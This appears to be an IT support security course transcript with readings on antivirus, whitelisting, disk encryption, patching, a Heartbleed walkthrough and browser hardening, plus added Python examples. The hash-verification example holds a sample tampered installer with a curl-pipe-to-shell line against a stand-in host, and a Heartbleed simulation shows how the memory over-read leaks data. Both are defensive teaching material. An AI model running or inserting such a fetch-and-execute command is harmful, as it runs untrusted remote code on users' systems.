If it detects activity that matches the signature, depending on the signature 
type, it will attempt to block the malware from harming the system. 
But some signatures might only be able to detect the malware after the infection 
has occurred. 
In that case, it may attempt to quarantine the infected files. 
If that's not possible, it'll just log and alert on the detection event at a high level. 
This signature model is the core of how antivirus products work, though modern 
products layer heuristic and behavioral detection on top of it. 
There are two issues with antivirus software though. 
The first is that they depend on antivirus signatures distributed by 
the antivirus software vendor. 
The second is that they depend on the antivirus vendor discovering new malware 
and writing new signatures for newly discovered threats. 
Until the vendor is able to write new signatures and publish and 
disseminate them, 
your antivirus software can't protect you from these emerging threats. 
Antivirus which is designed to protect systems, 
actually represents an additional attack surface that attackers can exploit. 
You might be thinking, wait, 
our own antivirus tools can be another threat to our system. 
What's the deal with that? 
Well, this is because of the very nature of what an antivirus engine must do. 
It takes arbitrary and potentially malicious binaries as input and 
performs various operations on them. 
Because of this, 
there is a lot of complex code where very serious bugs could exist. 
Exactly this kind of vulnerability was found in 
the Sophos antivirus engine back in 2012. 
So, it sounds like antivirus software isn't ideal and 
has some pretty large drawbacks. 
Then why are we still recommending it as a core piece of security design? 
The short answer is this, 
it protects against the most common attacks out there on the Internet. 
The really obvious stuff that still poses a threat to your systems still needs to be 
defended against. 
Antivirus is an easy solution to provide that protection. 
It doesn't matter how much user education you instill in your employees, there will 
still be some folks who will click on an email that has an infected attachment. 
A good way to think about antivirus in today's very noisy external threat 
environment, is like a filter for the attack noise on the internet today. 
It lets you remove the background noise and 
focus on the more important targeted or specific threats. 
Remember, our defense in depth concept involves multiple layers of protection. 
Antivirus software is just one piece of our anti malware defenses. 
If antivirus can't protect us from the threats we don't know about, 
how do we protect against the unknown that's out there? 
Well, antivirus operates on a blacklist model, 
checking against a list of known bad things and blocking what gets matched. 
There's a class of anti malware software that does the opposite. 
Binary whitelisting software operates off a white list. 
It's a list of known good and trusted software and 
only things that are on the list are permitted to run. 
Everything else is blocked. 
You can think of this as applying the implicit deny rule from ACLs to software 
execution. 
By default, everything is blocked. 
Only things explicitly allowed to execute are able to. 
I should call out that this typically only applies to executable binaries, 
not arbitrary files like pdf documents or text files. 
This would naturally defend against any unknown threats but 
at the cost of convenience. 
Think about how frequently you download and install new software on your machine. 
Now, imagine if you had to get approval before you could download and 
install any new software, that would be really annoying, don't you think? 
Now, imagine that every system update had to be white listed before it could be 
applied. 
Obviously, trusting nothing by default wouldn't be very sustainable. 
It's for this reason that binary whitelisting software can trust software 
using a couple different mechanisms. 
The first is using the unique cryptographic hash of binaries 
which are used to identify unique binaries. 
This is used to whitelist individual executables. 
The other trust mechanism is a software signing certificate. 
Remember back when we discussed public key cryptography and 
signatures using public and private key pairs, software signing or 
code signing is the same idea but applied to software. 
A software vendor can cryptographically sign binaries they 
distribute using a private key. 
The signature can be verified at execution time by checking the signature 
using the public key embedded in the certificate and 
verifying the trust chain of the public key. 
If the signature verifies and the public key is trusted, then the software can be verified 
to have come from someone holding the software vendor's code signing private key. 
Binary whitelisting systems can be configured to trust specific vendors 
code signing certificates. 
They permit all binaries signed with that certificate to run. 
This is helpful for automatically trusting content like system updates, along with 
software in common use that comes from reputable and trusted vendors. 
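The blacklist model of antivirus and the hash-based whitelist model described above, side by side, as an added example (not the course's code and not any product's). The "binaries" are constructed byte strings standing in for files on disk; only the hash mechanism is modeled, which is enough to show why the certificate mechanism is needed for updates.

```python
"""Added example, not from the course or any product: the two execution-control
models side by side. The antivirus model blocks what matches a known-bad hash
signature; the binary whitelisting model allows only what matches a known-good
hash and blocks everything else. The "binaries" are constructed byte strings."""
import hashlib

# Constructed stand-ins for executables (a real tool hashes the file on disk).
BINARIES = {
    "notepad.exe": b"MZ known good editor",
    "updater.exe": b"MZ vendor update agent v1",
    "invoice.exe": b"MZ known dropper payload",
    "new_stealer.exe": b"MZ never-before-seen malware",
}


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Antivirus: vendor-distributed signatures of malware seen so far. Only
# invoice.exe has one; new_stealer.exe has not been discovered yet.
MALWARE_SIGNATURES = {sha256(BINARIES["invoice.exe"])}

# Whitelisting: hashes the administrator has explicitly approved.
ALLOWED_HASHES = {sha256(BINARIES["notepad.exe"]), sha256(BINARIES["updater.exe"])}


def denylist_decision(data: bytes) -> str:
    """Antivirus model: allow unless the hash matches a known-bad signature."""
    return "block" if sha256(data) in MALWARE_SIGNATURES else "allow"


def allowlist_decision(data: bytes) -> str:
    """Whitelisting model: implicit deny, run only what is explicitly approved."""
    return "allow" if sha256(data) in ALLOWED_HASHES else "block"


def evaluate(binaries: dict) -> dict:
    """Map each file name to (antivirus decision, whitelisting decision)."""
    return {name: (denylist_decision(d), allowlist_decision(d)) for name, d in binaries.items()}


def trade_offs() -> dict:
    """Two cases the text calls out: a known malware sample changed by one byte
    (its hash no longer matches the signature), and a legitimate program after
    a vendor update (its hash is no longer on the allowlist until approved)."""
    repacked_malware = BINARIES["invoice.exe"] + b"\x00"
    updated_agent = BINARIES["updater.exe"].replace(b"v1", b"v2")
    return {
        "repacked_malware": (denylist_decision(repacked_malware), allowlist_decision(repacked_malware)),
        "updated_agent": (denylist_decision(updated_agent), allowlist_decision(updated_agent)),
    }


if __name__ == "__main__":
    for name, (av, wl) in evaluate(BINARIES).items():
        print(f"{name:16} antivirus={av:5} whitelist={wl}")
    for case, (av, wl) in trade_offs().items():
        print(f"{case:16} antivirus={av:5} whitelist={wl}")
```

The unknown stealer and the repacked dropper sail past the signature list but are blocked by implicit deny; the freshly updated agent is blocked too, which is the convenience cost that trusting a vendor's code signing certificate is meant to remove.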
But can you guess the downside here? 
Each new code signing certificate that's trusted represents an increase in attack 
surface. 
An attacker could compromise the code signing certificate of a software vendor 
that your company trusts. 
And use that to sign malware that targets your company. 
That would bypass any binary whitelisting defenses in place. 
Not good. 
This exact scenario happened back in 2013 to [INAUDIBLE], 
a binary whitelisting software company. 
Hackers managed to breach their internal network and 
found an unsecured virtual machine. 
It had a copy of the code signing certificates private key. 
They stole that key and used it to sign malware that would have been trusted by 
all [INAUDIBLE] software installations by default.

Supplemental Readings for Antimalware Protection
Learn how long it would take for an unprotected system to be compromised by bots, viruses, and worms in
the link here.

If you're interested in why security experts question the value of antivirus software, check out the link here.

If you want to read about how the Sophos antivirus system was maliciously compromised, see the link
here.

If you want to learn how hackers bypassed the binary whitelisting defenses that were in place for a
software vendor, check out the link here.

We briefly discussed disk encryption earlier when we talked about encryption at 
a high level. 
Now it's time to dive deeper. 
Full disk encryption or 
FDE is an important factor in a defense in depth security model. 
It provides protection from some physical forms of attack. 
As an IT Support specialist, 
you likely assist with implementing an FDE solution if one doesn't exist already. 
Help with migrating between FDE solutions and troubleshoot issues with 
FDE systems like helping with forgotten passwords, so FDE is key. 
Systems with their entire hard drives encrypted are resilient against 
data theft. 
They'll prevent an attacker from stealing potentially confidential information from 
a hard drive that's been stolen or lost. 
Without also knowing the encryption password or having access to 
the encryption key the data on the hard drive is just meaningless gibberish. 
This is a very important security mechanism to deploy for 
more mobile devices like laptops, cell phones and tablets. 
But it's also recommended for desktops and servers, since an attacker with 
physical access to an unencrypted disk can read it, replace system files with 
malicious ones or install malware without ever logging in. 
One caveat: the common FDE modes protect confidentiality, but most don't 
cryptographically detect tampering with the encrypted data, so pair FDE with 
secure or measured boot and a TPM-bound key where you can. 
Having the disk fully encrypted protects from data theft and makes 
unauthorized tampering far harder even if an attacker has physical access to the disk.

Supplemental Reading for Disk Encryption

There are first-party full-disk encryption (FDE) solutions from Microsoft and Apple, called BitLocker and
FileVault 2, respectively.

There are also a bunch of third-party and open-source solutions. On Linux, the dm-crypt package is very
popular.

There are also offerings from PGP, VeraCrypt and a host of others.

I think self learning is the key to success in this particular field. 
Technology changes all the time and 
you have to have a drive to learn about the new things coming out. 
And you're only going to get that if you are constantly keeping on top 
of what's going on and the more you do that, 
the more of an expert you become in lots of different areas. 
And by becoming an expert in them it propels you forward because if you can 
be the expert in the room you can teach others and you can also be the person 
that people rely on and it also builds your confidence over time. 
There are people who specialize deeply in security and 
that's all they do all day long. 
But in fact every person who works at Google is a security person. 
I think the IT support role is an incredibly pivotal role within Google from a security standpoint, and in many
cases it is the IT support 
people who will see Google being hacked for the first time. 
Had I not had an IT support experience early in my career, 
I probably wouldn't be able to bring the perspective that I do to the table in 
terms of how we make security better for everyone. 

While some attacks abuse exposed software features, 
a lot of attacks depend on exploiting bugs in software. 
This triggers obscure and unintended behavior, 
which can lead to a compromise of the system running the vulnerable software. 
These types of vulnerabilities can be fixed through software patches and 
updates which correct the bugs that the attackers exploit. 
As an IT support specialist, 
it's critical that you make sure that you install software updates and security 
patches in a timely way in order to defend your company's systems and networks.

Software updates don't just improve software products by adding new features 
and improving performance, and stability. 
They also address security vulnerabilities. 
There are some software bugs that are present in the core functionality of 
the software in question. 
This means that the vulnerability can't be mitigated by disabling the vulnerable 
service, not good. 
An example of this was the Heartbleed vulnerability, 
a bug in the open source TLS library OpenSSL. 
This was discovered and widely publicized in April of 2014. 
The bug showed up in how the library handled TLS heartbeat messages. 
They're special messages that allow one party in the TLS session to signal to 
the other party that they'd like the session to be kept alive. 
This works by sending a TLS heartbeat request message, 
a packet that has a text string and the length of the string. 
The receiving end is supposed to reply with the same text string in response. 
So if the heartbeat request message contains the text, 
I'm still alive and the length of 15, 
the receiving end would reply back with the same text, I am still alive. 
But the bug in the OpenSSL library was that the replying side would allocate 
a reply buffer and copy into it according to the length value in the received packet. 
This was based on the specified length of the string as it's defined in 
the packet, not on the actual length of the string that arrived. 
The value was not verified. 
This meant that an attacker could send a malformed heartbeat request 
message with a much larger length specified than what was allowed. 
The reply would contain the original text message, but 
would also include bits of memory from the replying system. 
So an attacker could send a malformed heartbeat request message 
containing the text I'm still alive, but 
with a length of 500 because the length value wasn't verified. 
This means that the response back would be I'm still alive followed by 
the next 485 characters in memory. 
So it was possible for an attacker to read up to 64 kilobytes of a target's memory. 
This memory was likely used before by the OpenSSL library, 
so it might contain sensitive information regarding other TLS sessions. 
This bug meant that it was feasible for an attacker to recover the private keys used 
to protect TLS sessions, this would allow them to decrypt TLS protected sessions and 
recover details like login credentials. 
This is a great example of a mistake in the code leading to a very high profile 
software vulnerability. 
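The heartbeat exchange just walked through, as an added Python model (not OpenSSL's code and not from the course). Process memory is a bytearray, the request carries a claimed payload length, and the vulnerable responder copies that many bytes without checking the claim against what was actually received; the fixed responder applies the bounds check the patch added. The leftover "session" data in memory is constructed.

```python
"""Added example, not from the course and not OpenSSL's code: a Python model
of the TLS heartbeat handler. Process memory is a bytearray, the request
carries a claimed payload length, and the vulnerable responder copies that
many bytes without checking the claim against the record it received."""
import struct

# Constructed leftover data sitting in memory right after the request buffer,
# standing in for material from an earlier TLS session.
LEFTOVER = b"[earlier session] user=alice password=hunter2 cookie=9f3c\x00"
PAYLOAD = b"I'm still alive"  # 15 bytes, as in the walkthrough above


def build_heartbeat(payload: bytes, claimed_length: int) -> bytes:
    """Heartbeat message: type(1) | payload_length(2) | payload | 16 bytes padding.
    claimed_length is what the sender *says* the payload length is."""
    return struct.pack("!BH", 1, claimed_length) + payload + b"\x00" * 16


def respond_vulnerable(memory: bytearray, offset: int) -> bytes:
    """Trusts the length field from the packet: the reply copies that many
    bytes starting at the payload, running past the request into whatever
    follows it in memory. This is the Heartbleed bug."""
    _, length = struct.unpack_from("!BH", memory, offset)
    start = offset + 3
    return struct.pack("!BH", 2, length) + bytes(memory[start:start + length]) + b"\x00" * 16


def respond_fixed(memory: bytearray, offset: int, record_length: int):
    """Patched behaviour: the claimed length must fit inside the record that was
    actually received (1 type + 2 length + payload + 16 padding); otherwise the
    heartbeat is discarded and nothing is sent back."""
    _, length = struct.unpack_from("!BH", memory, offset)
    if 1 + 2 + length + 16 > record_length:
        return None
    start = offset + 3
    return struct.pack("!BH", 2, length) + bytes(memory[start:start + length]) + b"\x00" * 16


def reply_payload(response: bytes) -> bytes:
    """What the requester gets back as the echoed payload."""
    _, length = struct.unpack_from("!BH", response, 0)
    return response[3:3 + length]


def simulate(claimed_length: int, fixed: bool = False):
    """Send one heartbeat with the given claimed length and return the echoed
    payload, or None when the fixed handler drops the request."""
    request = build_heartbeat(PAYLOAD, claimed_length)
    memory = bytearray(request + LEFTOVER)  # the request lands just before the leftover data
    response = respond_fixed(memory, 0, len(request)) if fixed else respond_vulnerable(memory, 0)
    return None if response is None else reply_payload(response)


if __name__ == "__main__":
    print(simulate(15))               # honest request: echoes the 15-byte payload
    print(simulate(500))              # lies about the length: payload plus leaked memory
    print(simulate(500, fixed=True))  # patched handler drops it: None
```

The length field is 16 bits, which is where the 64 kilobyte ceiling on each leak comes from; in the real library the copy ran through the process heap rather than stopping at the end of a Python slice.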
It could only be fixed by a software update or by 
switching to a different TLS library entirely. 
While the heartbeat functionality is enabled by default, 
it's possible to disable it in the OpenSSL library, but 
it wasn't a simple argument to pass to an application. 
Disabling this functionality required compiling the library with a flag that 
disabled heartbeats, 
then you had to replace the installed version with the custom compiled one. 
That's not something most people will do. 
This was also a library widely used by both server applications and 
client applications. 
This means that it might not be possible to replace the OpenSSL library with 
a customized version or a different library. 
The only way to address the vulnerability in client software that implemented 
OpenSSL was to wait for a patch from the software vendor. What a mess. 
Here's the bad news. 
With software continuing to grow more complex over time, 
these types of bugs are likely to become more commonplace. 
Attackers will be looking for exactly this type of vulnerability. 
The best protection is to have a good system and policy in place for 
your company. 
The system should be checking for, distributing and 
verifying software updates for software deployment. 
This is a complex problem when considering a large organization with many machines to 
manage that run a variety of software products. 
This is where management tools can help make this task more approachable for you. 
Solutions like Microsoft SCCM or Puppet Labs' Puppet and 
Facter tools allow administrators to get an overview of what software is 
installed across their fleet of managed systems. 
This lets the security team analyze what specific software and versions 
are installed to better understand the risk of vulnerable software in the fleet. 
When updates are released and pushed to the fleet, 
these reporting tools can help make sure that the updates have been applied. 
SCCM, even has the ability to force install updates after a specified deadline 
has passed. 
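The fleet-wide check those reporting tools perform, reduced to its core, as an added example (not SCCM, Puppet or Facter code, and not from the course): take an inventory of installed versions, compare each against the first version that carries the fix, and list the hosts still exposed. The inventory rows and all minimum versions except OpenSSL's real Heartbleed fix release are constructed for the example.

```python
"""Added example, not from the course and not SCCM/Puppet/Facter code: compare a
software inventory exported from a fleet with the minimum patched version per
package and report the hosts still running a vulnerable build. The inventory
is constructed; of the minimum versions only OpenSSL 1.0.1g is real."""
import re

# host,package,version - the kind of report a fleet management tool exports
INVENTORY = """\
web-01,openssl,1.0.1f
web-02,openssl,1.0.1g
db-01,openssl,1.0.2
laptop-17,firefox,115.0.1
laptop-18,firefox,118.0
printer-03,printer-firmware,2.4.1
"""

# First version containing the fix, per package (assumed values, except that
# OpenSSL 1.0.1g really is the Heartbleed fix release).
MIN_PATCHED = {"openssl": "1.0.1g", "firefox": "118.0", "printer-firmware": "2.5.0"}

_PART = re.compile(r"^(\d+)([a-z]?)$")


def parse_version(version: str) -> tuple:
    """Turn '1.0.1f' into ((1,''),(0,''),(1,'f')) so tuples compare the way
    version numbers should: numerically per component, with an OpenSSL-style
    trailing letter ordered after the bare number. A shorter version that is a
    prefix of a longer one ('1.0' vs '1.0.1') is treated as older."""
    parts = []
    for piece in version.split("."):
        m = _PART.match(piece)
        if not m:
            raise ValueError(f"unsupported version component: {piece!r}")
        parts.append((int(m.group(1)), m.group(2)))
    return tuple(parts)


def is_patched(installed: str, minimum: str) -> bool:
    return parse_version(installed) >= parse_version(minimum)


def vulnerable_hosts(inventory_csv: str, min_patched: dict) -> list:
    """Return (host, package, installed, required) for every row whose installed
    version is older than the minimum patched version. Packages with no entry
    in min_patched are skipped rather than reported."""
    findings = []
    for line in inventory_csv.splitlines():
        if not line.strip():
            continue
        host, package, installed = [f.strip() for f in line.split(",")]
        required = min_patched.get(package)
        if required is not None and not is_patched(installed, required):
            findings.append((host, package, installed, required))
    return findings


if __name__ == "__main__":
    for host, package, installed, required in vulnerable_hosts(INVENTORY, MIN_PATCHED):
        print(f"{host}: {package} {installed} is older than {required}")
```

Run against a real export, this is the report you would check before and after pushing an update to confirm the fleet actually moved; the string comparison a naive script would do ("1.0.1f" < "1.0.1g" happens to work, "1.0.2" < "1.0.10" does not) is exactly what parse_version avoids.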
Patching isn't just necessary for software, but also operating systems and 
firmware that run on infrastructure devices. 
Every device has code running on it that might have software bugs that could lead 
to security vulnerabilities from routers, switches, phones, even printers. 
Operating system vendors usually push security related patches pretty quickly 
when an issue is discovered. 
They'll usually release security fixes out of cycle from typical OS upgrades to 
ensure a timely fix, because of the security implications. 
But for embedded devices like network equipment or printers, 
this might not be typical. 
Critical infrastructure devices should be approached carefully when you apply 
updates. 
There's always the risk that a software update will introduce a new bug that might 
affect the functionality of the device or 
if the update process itself would go wrong and cause an outage. 
I hope you can see the importance of applying software patches and 
firmware updates in a timely fashion. 
It would be pretty embarrassing if you wind up being compromised by 
a vulnerability that could have been easily fixed with a software update.

Browser Hardening
In this reading, you will learn how to harden browsers for enhanced internet security. The methods
presented include evaluating sources for trustworthiness, SSL certificates, password managers, and
browser security best practices. Techniques for browser hardening are important components in
enterprise-level IT security policies. These techniques can also be used to improve internet security for
organizations of any size and for individual users. 

Identifying trusted versus untrusted sources

Some cybercriminals monitor SEO search terms for popular software downloads. Then they create fake
websites to pose as hosts for these popular downloads. They might even use advertising and stolen logos
of trusted companies to make the sites appear to be legitimate businesses. However, the downloadable
files available on the cybercriminals’ websites are usually malicious software. Unaware of the deception,
users download and install the malware. In some cases, the users don’t even need to download a file.
Savvy cybercriminals can design web pages that have the ability to infect users’ devices simply upon
visiting the sites. 

To guard against threats like this, there are checks you can perform to evaluate websites: 
 Use antivirus and anti-malware software and browser extensions. Run antivirus and anti-
malware scans regularly and scan downloaded files. Ensure antivirus and anti-malware browser
extensions are enabled when surfing the web.  
 Check for SSL certificates. See the “Secure connections and sites” section below. 
 Ensure the URL displayed in the address bar shows the correct domain name. For example,
Google websites use the Google.com domain name.
 Search for negative reviews of the website from trusted sources. Be wary of websites that have
few to no reviews. They may not have been active long enough to build a bad reputation.
Cybercriminals will create new websites when they get too many negative reviews on their older
sites. 
 Don’t automatically trust website links provided by people or organizations you trust. They may
not be aware that they are passing along links to malicious websites and files. 
 Use hashing algorithms for downloaded files. Compare the developer-provided hash value of the
original file to the hash value of the downloaded copy to ensure the two values match.
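The last check in that list, verifying a download against the developer's published hash, as an added example (not from the course). It reads the SHA256SUMS format the sha256sum tool produces, which is what many projects publish. The file contents and the published list are constructed in memory so it runs offline; in practice the list must come from a channel you trust separately from the download itself, such as the vendor's own site over HTTPS or a signed release page.

```python
"""Added example, not from the course: check a downloaded file against the hash
the developer publishes, in the SHA256SUMS format written by the sha256sum
tool. The file contents and the published list are constructed here."""
import hashlib

GOOD_INSTALLER = b"#!/bin/sh\necho 'installing'\n"
TAMPERED_INSTALLER = b"#!/bin/sh\necho 'installing'\ncurl -s http://mirror.invalid/x | sh\n"

# What the vendor published (constructed): "<hex digest>  <file name>" per line,
# or "<hex digest> *<file name>" when sha256sum was run in binary mode.
PUBLISHED_SHA256SUMS = (
    hashlib.sha256(GOOD_INSTALLER).hexdigest() + "  installer.sh\n"
    + hashlib.sha256(b"release notes").hexdigest() + " *NOTES.txt\n"
)


def parse_sha256sums(text: str) -> dict:
    """Return {file name: expected hex digest}, accepting both sha256sum line forms."""
    expected = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.strip()
        if name.startswith("*"):
            name = name[1:]
        if len(digest) != 64:
            raise ValueError(f"bad digest on line: {line!r}")
        expected[name] = digest.lower()
    return expected


def verify_download(file_name: str, data: bytes, expected: dict) -> str:
    """'ok' when the downloaded bytes hash to the published value, 'mismatch'
    when they do not, 'unlisted' when the vendor published no hash for it."""
    if file_name not in expected:
        return "unlisted"
    actual = hashlib.sha256(data).hexdigest()
    return "ok" if actual == expected[file_name] else "mismatch"


if __name__ == "__main__":
    expected = parse_sha256sums(PUBLISHED_SHA256SUMS)
    print("good copy:", verify_download("installer.sh", GOOD_INSTALLER, expected))
    print("tampered copy:", verify_download("installer.sh", TAMPERED_INSTALLER, expected))
    print("no published hash:", verify_download("other.bin", b"", expected))
```

A "mismatch" after a download from a mirror or a search-result site is exactly the signal the paragraph above is after; an "unlisted" result means you have nothing to compare against and should find the hash on the developer's own page before trusting the file.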

Secure connections and sites

TLS certificates, still commonly called Secure Socket Layer (SSL) certificates after the protocol's older
name, are issued by certificate authorities (CAs) that browsers trust, such as DigiCert. A valid certificate
means that data sent between your browser and the website is encrypted, and that the CA confirmed the
applicant controls that domain name. For most certificates that is all the CA checked, so a certificate says
nothing about whether the site's operator is honest. You can view a website's certificate by performing
the following steps:

1. Check the URL in the address bar. The URL should begin with the https:// protocol. If you see
http:// without the "s", the connection is not encrypted and the site's identity has not been verified.
2. Click on the closed padlock icon in the address bar to the left of the URL. A "Not secure" label or a
warning icon in place of the padlock indicates that the connection is not secure.
3. A pop-up menu should open. Websites with valid certificates will have a menu option labeled
"Connection is secure." Click on this menu item.
4. A new pop-up menu will appear with a link to check the certificate information. The layout and
wording of this pop-up will vary depending on which browser you are using. When you review the
certificate, look for the following items:
a. The name of the issuer - Make sure it is a trusted certificate authority.
b. The domain it was issued to - This name (listed in the Subject Alternative Name field) should
match the website domain name.
c. The expiration date - The certificate should not have passed its expiration date.
Note that cybercriminals can obtain certificates too; a domain-validated certificate only proves that
whoever requested it controlled that domain name at the time. So, this is not a guarantee that the site is
safe. CAs also vary in how thorough they are in their inspections.
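The same three checks (issuer, name, expiration date) can be automated. The following is an added example, not part of the original reading: it works on the dictionary that Python's ssl module returns from getpeercert(); the certificate dictionary is constructed for the example, and the list of trusted issuer names is a hypothetical organisational allowlist rather than a statement about any real CA.

```python
"""Check the three certificate fields the reading lists: issuer, name, expiry.

Added example; not part of the original reading. It works on the dictionary
Python's ssl module returns from SSLSocket.getpeercert(). SAMPLE_CERT is
constructed for this example, and TRUSTED_ISSUERS is a hypothetical
organisational allowlist, not a statement about any real CA.
"""
import socket
import ssl
import time

# Hypothetical allowlist of issuer organisation names this organisation accepts.
TRUSTED_ISSUERS = {"DigiCert Inc", "Let's Encrypt"}

# Constructed sample in the shape returned by ssl.SSLSocket.getpeercert().
SAMPLE_CERT = {
    "subject": ((("commonName", "www.example.com"),),),
    "issuer": (
        (("countryName", "US"),),
        (("organizationName", "DigiCert Inc"),),
        (("commonName", "DigiCert TLS RSA SHA256 2020 CA1"),),
    ),
    "notBefore": "Jan  1 00:00:00 2024 GMT",
    "notAfter": "Dec 31 23:59:59 2024 GMT",
    "subjectAltName": (
        ("DNS", "example.com"),
        ("DNS", "www.example.com"),
        ("DNS", "*.cdn.example.com"),
    ),
}


def _field(cert, section, key):
    """First value of `key` in a subject/issuer RDN sequence, or None."""
    for rdn in cert.get(section, ()):
        for k, v in rdn:
            if k == key:
                return v
    return None


def name_matches(cert, hostname):
    """Does hostname match a DNS entry in subjectAltName?

    Only the SAN list counts; browsers ignore the commonName. A wildcard
    covers exactly one leftmost label ("*.cdn.example.com" matches
    img.cdn.example.com, not a.b.cdn.example.com or cdn.example.com).
    """
    host = hostname.lower().rstrip(".")
    for kind, value in cert.get("subjectAltName", ()):
        if kind != "DNS":
            continue
        pattern = value.lower()
        if pattern.startswith("*."):
            label, _, rest = host.partition(".")
            if label and "." + rest == pattern[1:]:
                return True
        elif pattern == host:
            return True
    return False


def check_certificate(cert, hostname, now=None, trusted_issuers=TRUSTED_ISSUERS):
    """Run the three checks and return them with an overall verdict."""
    now = time.time() if now is None else now
    not_before = ssl.cert_time_to_seconds(cert["notBefore"])
    not_after = ssl.cert_time_to_seconds(cert["notAfter"])
    issuer_org = _field(cert, "issuer", "organizationName")
    result = {
        "issuer": issuer_org,
        "issuer_trusted": issuer_org in trusted_issuers,
        "name_matches": name_matches(cert, hostname),
        "in_validity_period": not_before <= now <= not_after,
    }
    result["ok"] = all(result[k] for k in ("issuer_trusted", "name_matches", "in_validity_period"))
    return result


def fetch_server_cert(host, port=443, timeout=5.0):
    """Fetch a live server's certificate with the default, verifying context.

    Needs network access, so the offline demo below does not call it. With a
    verifying context getpeercert() only returns the parsed dictionary after
    chain validation succeeded; otherwise the handshake raises
    ssl.SSLCertVerificationError.
    """
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()


def demo():
    """Exercise the constructed certificate at a few points in time."""
    mid_2024 = ssl.cert_time_to_seconds("Jun 15 12:00:00 2024 GMT")
    in_2025 = ssl.cert_time_to_seconds("Mar  1 12:00:00 2025 GMT")
    return {
        "valid": check_certificate(SAMPLE_CERT, "www.example.com", now=mid_2024)["ok"],
        "wrong_host": check_certificate(SAMPLE_CERT, "login.example.com", now=mid_2024)["ok"],
        "expired": check_certificate(SAMPLE_CERT, "www.example.com", now=in_2025)["ok"],
        "untrusted_issuer": check_certificate(
            SAMPLE_CERT, "www.example.com", now=mid_2024, trusted_issuers={"Other CA"})["ok"],
        "wildcard": name_matches(SAMPLE_CERT, "img.cdn.example.com"),
        "wildcard_two_labels": name_matches(SAMPLE_CERT, "a.b.cdn.example.com"),
    }


if __name__ == "__main__":
    print(demo())
```

The browser already performs the chain, name and date checks on every HTTPS connection; what this adds is the organisational policy layer (which issuers you accept) and the habit of reading the Subject Alternative Name rather than the commonName. Passing all three checks still says nothing about whether the site's operator is honest, exactly as the note above says.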

Password managers

Password managers are software programs that encrypt and retain passwords in secure cloud storage or
locally on users’ personal computing devices. There are a wide variety of activities users perform online
that require unique and complex passwords, such as banking, managing health records, filing taxes, and
more. It can be difficult for users to keep track of so many different logins and passwords. Fortunately,
password managers can help. 

• Advantages of using a password manager:
o It provides only one password for a user to remember;
o Can generate and store secure passwords that are difficult for cybercriminal tools to crack;
o Is more secure than keeping passwords written down on paper or in an unencrypted file
on a computer; and
o Works across multiple devices and operating systems.
• Disadvantages of using a password manager:
o It can expose all of the user's account credentials if a cybercriminal obtains the master
password to the password manager;
o Can be very difficult for a user to regain access to the password manager account if the
master password is lost or forgotten;
o Requires the user to learn a new method for logging in to their various accounts in order to
retrieve passwords from the password manager software; and
o Often requires a fee or subscription for password management services.
The first two disadvantages are reduced by choosing a long, unique master passphrase, turning on
multi-factor authentication for the password manager itself, and keeping its recovery code offline.
A few of the top brands for password manager applications include Bitwarden, LastPass, and 1Password.
Please see the Resource section at the end of this reading for more information.

Browser settings

Browser settings can be configured for additional safety measures. Some additional options for hardening
browsers include: 

1. Use pop-up blockers: Disable Web Browser Pop-up Blockers


2. Clear browsing data and cache: Clear your web browser's cache, cookies, and history
3. Use private-browsing mode: How to Turn on Incognito Mode in Your Browser
4. Sign-in/browser data synchronization:
a. Turn sync on and off in Chrome
b. Disable Firefox Sync
c. Change and customize sync settings in Microsoft Edge
5. Use ad blockers: How to block ads

Key takeaways

You learned about multiple steps you can take to harden a browser and protect your online security: 

• Identify if sources can be trusted or not:
o Use antivirus and anti-malware software and browser extensions.
o Check for SSL/TLS certificates.
o Ensure the URL displayed in the address bar shows the correct domain name.
o Search for negative reviews of the website from trusted sources.
o Don't automatically trust website links provided by people or organizations you trust.
o Verify the hashes of downloaded files.
• Use a password manager.
• Configure your browser settings:
o Use pop-up blockers.
o Clear browsing data and cache.
o Use private-browsing mode.
o Review sign-in/browser data synchronization.
o Use ad blockers.
Resources for more information

To learn more about hardening browsers for safer web surfing, please visit the following articles:

• Dubious downloads: How to check if a website and its files are malicious - Provides information on
evaluating websites and downloads for the presence of malware.
• The Best Password Managers to Secure Your Digital Life - Compares and contrasts the top
password managers on the market.
• Avoiding Social Engineering and Phishing Attacks - Tips for avoiding an array of internet scams.
• Blocking Unnecessary Advertising Web Content - From the United States National Security Agency
Cybersecurity Information, notice about ad-blocking through network functions, at the host level,
and other concerns.
• Securing Web Browsers and Defending Against Malvertising for Federal Agencies - From the United
States Cybersecurity and Infrastructure Security Agency, guide for protecting computing systems
from malvertising.
• Browser sync - what are the risks of turning it on? - Explains the security threats associated with
having browsers set to synchronize account data across multiple devices.
• List of Participants - Microsoft Trusted Root Program - Microsoft's list of trusted Certificate
Authorities and the common names of the issued certificates.

As you can see, application software can represent a pretty large attack surface. This is especially true when it comes to a large fleet of systems used throughout an organization. It's important to have some kind of application policies in place. These policies serve two purposes. Not only do they define boundaries of what applications are permitted or not, but they also help educate folks on how to use software more securely.

We've seen the risks that software can pose because of security vulnerabilities. It makes sense to have a policy around applying software updates in a timely way. A common recommendation, or even a requirement, is to only support or require the latest version of a piece of software. From the IT support perspective, this is important because software updates often fix issues that someone may be encountering. But from the security side of things, making sure the latest version of the software is in use ensures that all security patches have been applied, and the most secure version is in use. This should be clearly called out in a policy. People tend to be pretty lazy about applying updates to software that they use a lot. Lots of times, applying an update requires restarting the application, which can feel inconvenient and disruptive to users.

It's generally a good idea to disallow risky classes of software by policy. Things like file-sharing software and piracy-related software tend to be closely associated with malware infections. They usually don't have a business use either. Let's not even talk about the legal implications of this type of software.

Understanding what your users need to do their jobs will help shape your approach to software policies and guidelines. If there's a common use case for a certain type of software, it would be helpful to select a specific software implementation and require the use of that solution. This lets you evaluate the most secure solution, and benefit from a more uniform software installation. Remember, the name of the game is to minimize attack surfaces. Each piece of software that accomplishes the same thing represents a different set of potential attack surfaces that could have a vulnerability lurking inside. Helping your users accomplish tasks by recommending or supporting specific software makes for a more secure environment. It also helps users by giving them clear solutions to accomplish tasks.

If you want to employ a binary whitelisting solution, it's also important to define a policy around what type of software can be whitelisted. It's probably unnecessary to have video games whitelisted, unless your company is a video game studio, of course. These policies usually require some business use case or justification to avoid a lot of one-off personal software requests.

